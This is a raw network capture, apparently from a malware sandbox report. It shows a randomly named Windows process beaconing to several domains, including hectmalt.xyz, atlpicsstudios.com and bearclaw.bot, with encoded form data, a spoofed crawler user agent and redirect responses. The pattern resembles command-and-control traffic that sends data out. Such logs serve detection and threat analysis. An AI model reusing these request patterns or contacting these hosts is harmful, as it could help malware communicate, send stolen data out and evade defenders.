                                                          Jul 13, 2024 00:03:36.064721107 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:35 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID: 11 | Source IP: 192.168.2.6 | Source Port: 49733 | Destination IP: 203.161.41.207 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:37.998825073 CEST | 1756 | OUT | POST /9ntw/ HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.hectmalt.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.hectmalt.xyz/9ntw/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4f 48 51 38 37 56 76 5a 77 56 37 45 43 6d 34 78 6c 65 6c 72 71 79 4c 34 52 32 4b 47 74 39 58 31 76 59 4a 50 71 72 59 4e 70 5a 78 56 6b 47 33 50 74 63 61 6a 38 42 51 4a 53 50 6a 52 44 69 34 6e 49 4e 6d 45 44 53 42 73 2f 65 74 43 77 32 46 50 71 4c 56 52 4a 2b 70 74 58 72 39 67 43 76 79 4a 56 37 45 78 31 68 50 61 46 67 59 42 79 75 2b 50 77 66 78 73 57 59 4a 34 57 72 33 45 6f 48 36 6d 57 30 4e 59 53 61 76 36 74 30 31 4f 32 30 30 63 4a 57 5a 48 32 4d 71 75 32 39 64 72 2b 2b 79 64 4a 50 6a 69 77 54 56 71 35 63 38 32 43 41 4c 77 30 38 67 48 49 67 30 6a 4a 71 74 31 2b 43 59 51 39 43 79 49 39 50 53 6b 48 6b 4f 4b 30 73 2f 6a 70 69 6f 69 79 7a 34 33 77 38 4f 41 36 2b 71 78 63 41 31 44 6d 69 72 73 72 33 4d 6b 69 71 2f 37 2b 45 72 58 6e 73 65 61 6c 32 4a 32 33 63 59 41 6d 56 6f 5a 45 75 39 70 70 58 30 6d 42 6e 64 36 78 63 52 75 4f 37 4b 33 55 79 79 37 33 64 55 59 64 76 5a 47 41 61 62 39 33 4b 63 53 6c 32 47 6c 52 43 52 31 31 30 31 63 53 67 35 46 44 34 4a 52 62 58 67 53 37 51 51 54 55 77 [TRUNCATED]
                                                          Data Ascii: D0Pts04=[TRUNCATED]
                                                          Jul 13, 2024 00:03:38.602013111 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:38 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 49734 | Destination IP: 203.161.41.207 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:40.530049086 CEST | 466 | OUT | GET /9ntw/?D0Pts04=DF4c4jTIr0uCfSFE8clupTbEYGiU8fGq77V3jsF9odELuFK4p5vQm2AEcbSTGQxVKs+ZCGJ5ndNcuFNuj9dUFu4scKZ8BqW+NctVnA+PUwBNu7O6tttncLZAbI+QrUa9UBZ9fN0=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.hectmalt.xyz
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:41.148921013 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 12 Jul 2024 22:03:41 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID: 13 | Source IP: 192.168.2.6 | Source Port: 49735 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:46.192123890 CEST | 737 | OUT | POST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 47 67 76 32 79 64 70 66 71 75 37 79 66 4a 34 77 71 4a 55 72 46 43 6c 68 72 31 2b 56 4a 4e 6b 35 41 6f 39 34 4c 49 30 64 79 51 4b 70 49 6a 43 42 6d 35 58 6d 49 6e 35 79 64 58 73 32 6e 31 38 44 59 74 59 54 30 45 46 43 35 4f 48 70 62 63 65 77 69 59 46 39 43 7a 4e 49 36 64 54 31 4e 77 4e 72 57 4b 63 72 62 45 35 45 33 7a 46 48 53 78 4a 56 72 35 77 4f 33 79 76 6d 69 74 2f 73 77 33 52 79 41 31 69 78 67 6e 31 39 44 78 75 68 6b 2f 69 65 37 4d 51 49 63 61 63 49 75 70 32 58 6e 49 34 34 37 67 35 58 70 61 2b 2f 65 58 75 73 76 42 78 54 35 69 37 55 67 52 6f 4e 6a 6c 6f 44 49 58 41 35
                                                          Data Ascii: D0Pts04=c+TIz73J0JxBGgv2ydpfqu7yfJ4wqJUrFClhr1+VJNk5Ao94LI0dyQKpIjCBm5XmIn5ydXs2n18DYtYT0EFC5OHpbcewiYF9CzNI6dT1NwNrWKcrbE5E3zFHSxJVr5wO3yvmit/sw3RyA1ixgn19Dxuhk/ie7MQIcacIup2XnI447g5Xpa+/eXusvBxT5i7UgRoNjloDIXA5


                                                          Session ID: 14 | Source IP: 192.168.2.6 | Source Port: 49736 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:48.734755993 CEST | 761 | OUT | POST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 34 38 35 4f 71 6c 34 4b 4a 30 64 37 41 4b 70 61 44 43 45 69 35 58 76 49 6e 6b 50 64 56 6f 32 6e 31 6f 44 59 6f 38 54 31 33 64 42 37 65 48 76 53 38 65 79 74 34 46 39 43 7a 4e 49 36 64 33 66 4e 7a 39 72 57 36 4d 72 59 6c 35 44 70 6a 46 45 56 78 4a 56 76 35 77 4b 33 79 75 7a 69 73 69 4a 77 78 56 79 41 33 36 78 67 79 42 36 49 78 75 64 71 66 6a 31 34 64 4a 78 54 5a 73 4e 6c 34 69 61 37 49 5a 66 36 57 34 4e 31 70 2b 63 4d 48 4f 75 76 44 70 68 35 43 37 2b 69 52 51 4e 78 79 6b 6b 48 6a 6c 61 41 49 44 30 62 78 6d 66 70 44 35 6d 6a 59 30 77 47 38 4e 72 57 51 3d 3d
                                                          Data Ascii: D0Pts04=c+TIz73J0JxBHBf2hqdftO7xQp4w4JUvFCphr3SjK485Oql4KJ0d7AKpaDCEi5XvInkPdVo2n1oDYo8T13dB7eHvS8eyt4F9CzNI6d3fNz9rW6MrYl5DpjFEVxJVv5wK3yuzisiJwxVyA36xgyB6Ixudqfj14dJxTZsNl4ia7IZf6W4N1p+cMHOuvDph5C7+iRQNxykkHjlaAID0bxmfpD5mjY0wG8NrWQ==


                                                          Session ID: 15 | Source IP: 192.168.2.6 | Source Port: 49737 | Destination IP: 3.33.130.190 | Destination Port: 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:51.266316891 CEST | 1774 | OUT | POST /8td2/ HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.atlpicsstudios.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.atlpicsstudios.com/8td2/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 63 2b 54 49 7a 37 33 4a 30 4a 78 42 48 42 66 32 68 71 64 66 74 4f 37 78 51 70 34 77 34 4a 55 76 46 43 70 68 72 33 53 6a 4b 37 63 35 4f 66 78 34 4b 71 63 64 68 41 4b 70 42 44 43 46 69 35 57 2f 49 6e 38 4c 64 56 31 44 6e 32 51 44 4b 65 77 54 79 43 70 42 79 65 48 76 51 38 65 7a 69 59 45 2f 43 7a 64 79 36 64 6e 66 4e 7a 39 72 57 38 41 72 4d 45 35 44 72 6a 46 48 53 78 4a 6a 72 35 77 75 33 79 58 45 69 76 50 38 77 42 31 79 42 58 71 78 76 6b 64 36 55 68 75 66 70 66 6a 74 34 64 31 51 54 5a 78 30 6c 34 58 78 37 4c 46 66 33 53 74 35 77 4b 6a 41 50 46 61 77 78 6b 56 64 67 55 72 42 75 41 46 33 30 45 30 7a 46 6a 74 61 5a 5a 32 74 50 52 54 39 68 51 6c 6b 6a 59 46 64 44 2f 73 73 57 43 4c 4e 33 2f 64 2b 45 42 4f 6d 2b 4f 78 57 33 41 75 77 78 4a 77 32 6e 75 71 53 31 59 58 74 71 6d 73 4d 61 41 30 35 53 4d 66 54 38 4e 72 31 46 74 6b 72 74 7a 34 54 49 44 42 78 65 64 4f 62 7a 73 54 63 4b 55 4b 56 72 6a 69 42 4c 38 4d 45 6e 6e 4a 4f 4a 56 68 75 39 6b 46 70 54 6f 76 50 72 6f 7a 70 43 42 77 76 39 52 [TRUNCATED]
                                                          Data Ascii: D0Pts04=[TRUNCATED]


                                                          Session ID: 16 | Source IP: 192.168.2.6 | Source Port: 49738 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:53.802059889 CEST | 472 | OUT | GET /8td2/?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.atlpicsstudios.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:03:54.261599064 CEST | 418 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:03:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 52 38 37 6f 77 4d 44 6c 76 2f 67 50 58 42 2b 69 71 34 35 63 69 38 6a 63 52 73 38 77 39 62 55 48 43 69 70 37 67 77 69 45 4c 5a 74 6f 4b 35 77 6d 48 61 34 56 36 33 57 34 45 67 4c 38 6d 4e 48 6d 53 56 4e 68 59 67 46 74 75 30 63 5a 55 38 77 70 39 7a 5a 68 33 37 43 6c 65 2b 57 4e 74 4b 59 6d 64 79 77 6b 6a 64 36 52 50 6a 35 59 56 4b 55 66 46 46 31 4d 39 52 64 6f 51 52 55 31 30 61 6b 41 76 53 76 72 70 36 38 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=R87owMDlv/gPXB+iq45ci8jcRs8w9bUHCip7gwiELZtoK5wmHa4V63W4EgL8mNHmSVNhYgFtu0cZU8wp9zZh37Cle+WNtKYmdywkjd6RPj5YVKUfFF1M9RdoQRU10akAvSvrp68=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 49739 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:03:59.298512936 CEST | 719 | OUT | POST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 66 77 6a 37 77 49 34 76 6a 44 46 59 43 73 59 6d 32 71 57 59 6c 4f 6a 4e 47 4b 67 66 71 76 4b 76 4d 66 72 41 64 74 6a 45 6a 64 44 74 7a 51 4b 4b 57 4f 47 50 31 32 75 31 6d 66 71 6f 4e 68 68 7a 6d 77 4b 71 76 55 31 50 6f 73 2b 36 62 6e 62 38 4b 51 33 50 47 44 68 4b 43 74 45 7a 31 43 77 51 51 51 62 54 49 4e 58 2f 62 45 50 61 53 5a 41 56 76 62 31 59 54 55 63 62 7a 6a 31 48 33 61 4a 47 4e 77 77 62 52 55 53 35 38 4e 42 4a 33 4c 66 41 62 57 77 4d 49 6d 37 2b 70 78 32 56 71 7a 42 63 6b 74 2b 62 73 4b 6e 43 51 55 63 66 53 70 57 55 70 34 76 4b 78 64 42 69 59 5a 49 49 47 38 41 6e
                                                          Data Ascii: D0Pts04=FTDkRuuk2Ocrfwj7wI4vjDFYCsYm2qWYlOjNGKgfqvKvMfrAdtjEjdDtzQKKWOGP12u1mfqoNhhzmwKqvU1Pos+6bnb8KQ3PGDhKCtEz1CwQQQbTINX/bEPaSZAVvb1YTUcbzj1H3aJGNwwbRUS58NBJ3LfAbWwMIm7+px2VqzBckt+bsKnCQUcfSpWUp4vKxdBiYZIIG8An


                                                          Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49740 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:01.828516960 CEST | 743 | OUT | POST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 2b 76 4d 37 6a 41 63 76 4c 45 69 64 44 74 72 67 4b 50 62 75 47 55 31 32 69 44 6d 65 57 6f 4e 68 64 7a 6d 77 36 71 76 48 64 49 70 38 2b 76 4f 33 62 2b 48 77 33 50 47 44 68 4b 43 74 51 5a 31 43 34 51 51 67 4c 54 4c 73 58 34 45 30 50 64 56 5a 41 56 72 62 31 45 54 55 64 2b 7a 69 34 67 33 63 46 47 4e 30 30 62 52 46 53 34 32 4e 42 50 35 72 65 41 4c 57 52 57 4a 30 4f 31 6d 67 33 34 39 69 63 6d 73 37 2f 42 77 35 6e 68 43 45 38 64 53 72 4f 6d 70 59 76 67 7a 64 35 69 4b 4f 45 76 4a 49 6c 45 67 59 76 56 4b 41 79 67 2f 4d 47 53 4a 35 45 57 75 6d 56 4c 52 77 3d 3d
                                                          Data Ascii: D0Pts04=FTDkRuuk2OcrcQz7yvMv2TFZe8Ym5KWclOvNGIMPqc+vM7jAcvLEidDtrgKPbuGU12iDmeWoNhdzmw6qvHdIp8+vO3b+Hw3PGDhKCtQZ1C4QQgLTLsX4E0PdVZAVrb1ETUd+zi4g3cFGN00bRFS42NBP5reALWRWJ0O1mg349icms7/Bw5nhCE8dSrOmpYvgzd5iKOEvJIlEgYvVKAyg/MGSJ5EWumVLRw==


                                                          Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 49741 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:04.359688044 CEST | 1756 | OUT | POST /euu6/ HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.bearclaw.bot
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.bearclaw.bot/euu6/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 46 54 44 6b 52 75 75 6b 32 4f 63 72 63 51 7a 37 79 76 4d 76 32 54 46 5a 65 38 59 6d 35 4b 57 63 6c 4f 76 4e 47 49 4d 50 71 63 6d 76 4d 4d 6a 41 64 49 2f 45 68 64 44 74 69 41 4b 4f 62 75 47 56 31 31 54 4b 6d 65 62 54 4e 6e 5a 7a 6e 52 61 71 37 69 70 49 6e 38 2b 76 4d 33 62 39 4b 51 33 67 47 41 49 43 43 74 41 5a 31 43 34 51 51 6a 6a 54 66 4e 58 34 43 30 50 61 53 5a 41 5a 76 62 31 34 54 55 45 44 7a 69 74 58 32 73 6c 47 4e 55 6b 62 58 7a 4f 34 72 64 42 4e 34 62 65 75 4c 57 63 49 4a 77 75 49 6d 67 43 6a 39 67 41 6d 6d 38 50 63 71 59 58 37 61 6e 51 6b 44 4b 6d 62 72 2f 2f 7a 2b 73 6b 53 61 76 4d 4e 49 73 68 7a 70 39 33 32 4f 44 37 4e 77 39 79 4f 41 64 52 56 6a 47 49 77 53 55 48 37 41 48 34 78 4b 71 6f 49 44 54 48 33 41 68 4a 35 39 55 6b 39 4e 53 64 64 36 68 38 43 33 78 6f 35 6d 44 6b 33 63 31 39 32 2b 45 55 4a 6a 73 70 53 6d 30 57 7a 38 4b 33 35 70 69 48 63 5a 6c 43 59 30 54 46 62 75 51 42 4f 79 31 6b 71 34 56 69 68 54 63 2f 4a 4e 47 4a 71 61 69 47 74 65 51 6a 78 63 54 6b 62 72 6c [TRUNCATED]
                                                          Data Ascii: D0Pts04=[TRUNCATED]


                                                          Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 49743 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 5396 | Process: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 13, 2024 00:04:06.889780998 CEST | 466 | OUT | GET /euu6/?D0Pts04=IRrESbehp9A4c0arrNhB2SQGHqYh5p2Ry9/8PtMUjfb6CsHcfdyH5ffjriDVQd7StG/Sopj8DEdssgOk9jRaqOeuB2qzCVXsHxIBR/Jt3DgaUXnoWNbvMCXYX6xoy7VuQx0h7Vc=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.bearclaw.bot
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:04:07.348738909 CEST | 418 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:04:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 49 52 72 45 53 62 65 68 70 39 41 34 63 30 61 72 72 4e 68 42 32 53 51 47 48 71 59 68 35 70 32 52 79 39 2f 38 50 74 4d 55 6a 66 62 36 43 73 48 63 66 64 79 48 35 66 66 6a 72 69 44 56 51 64 37 53 74 47 2f 53 6f 70 6a 38 44 45 64 73 73 67 4f 6b 39 6a 52 61 71 4f 65 75 42 32 71 7a 43 56 58 73 48 78 49 42 52 2f 4a 74 33 44 67 61 55 58 6e 6f 57 4e 62 76 4d 43 58 59 58 36 78 6f 79 37 56 75 51 78 30 68 37 56 63 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
